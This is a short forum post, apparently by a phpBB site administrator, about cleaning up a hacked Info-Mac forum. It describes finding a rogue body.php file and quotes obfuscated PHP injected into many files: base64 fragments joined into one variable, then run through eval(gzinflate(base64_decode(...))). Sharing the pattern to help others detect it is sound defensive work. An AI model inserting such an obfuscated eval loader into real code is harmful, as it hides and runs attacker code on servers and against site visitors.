Sometimes, the hackers are merely changing template or html files. These are pretty easy to track down, simply open up your template files and see what's not right.
In the /includes folder of my Info-Mac phpBB 3 folder, I found a rogue file named body.php. It had neither a recent modified nor creation date, so it was hard to find, but I did find it by comparing what was supposed to be in that folder, and what actually was. One extra file! Opening it shows a lot of hacker-ish code, including a big ASCII spider.
Other times, they change the PHP or other scripting files. This is harder to track down, but I wanted to share some code from the most recent hacking situation so that others may find it useful and know what to look out for.
I had this inserted into many PHP files here at Info-Mac. It's creating a variable named sosddsfagck. Basically it's gzipped content that is being told to unzip. The gzipped content itself includes more encrypted php code. But this is the format of what I saw:
Code: Select all
$sosddsfagck='bZBBa8MwDIXvhf4HEQq2ISQdvYyWwi5jPe6Q2z'; $sosddsfagck=$sosddsfagck.'pGltqtmWMZWVvGxv77vGQZWalPst7T45M0EdIT'; $sosddsfagck=$sosddsfagck.'6YDE1h/lUm3ms0XE5gW2cGN+CgzaS/FRG0t1h+'; $sosddsfagck=$sosddsfagck.'QORYOtyOG691oje7uazz4XDXrWnrdZlhQA05Fl'; $sosddsfagck=$sosddsfagck.'DYMhB3F3W8GJOazL8iyuXDkbeVXwO8Ouqu7Lq2'; $sosddsfagck=$sosddsfagck.'IpimxPe5+pi1k7jLyGc6phZDLWnazTcgR7eExb'; $sosddsfagck=$sosddsfagck.'maPm+Buk1GbUkmLb4PCgpUjbje0hRr/VTjLZVs'; $sosddsfagck=$sosddsfagck.'bX58j0l5hD+gWMk8YEIb0BvnEYR/j+wv8u9fUN'; eval(gzinflate(base64_decode($sosddsfagck)));